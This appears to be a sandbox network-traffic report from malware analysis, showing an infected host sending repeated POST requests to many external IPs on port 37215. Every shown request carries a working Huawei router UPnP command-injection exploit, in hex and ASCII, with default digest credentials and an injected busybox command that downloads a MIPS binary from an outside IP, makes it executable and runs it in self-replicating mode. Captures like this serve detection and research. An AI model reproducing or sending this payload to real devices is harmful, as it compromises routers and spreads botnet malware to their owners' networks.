                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1533192.168.2.1332936197.13.169.9037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.584177017 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1534192.168.2.1344366157.27.200.8137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.584186077 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1535192.168.2.1357928157.253.172.337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.584208012 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1536192.168.2.1360974197.255.214.5137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.584239960 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1537192.168.2.134779241.117.214.5337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.584243059 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1538192.168.2.1333106157.181.144.14837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.584259987 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1539192.168.2.1359242197.153.169.21537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.584285021 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1540192.168.2.133936841.107.125.8237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.584295034 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1541192.168.2.1347084202.88.94.7237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.584316015 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1542192.168.2.135658241.219.25.2837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.584335089 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
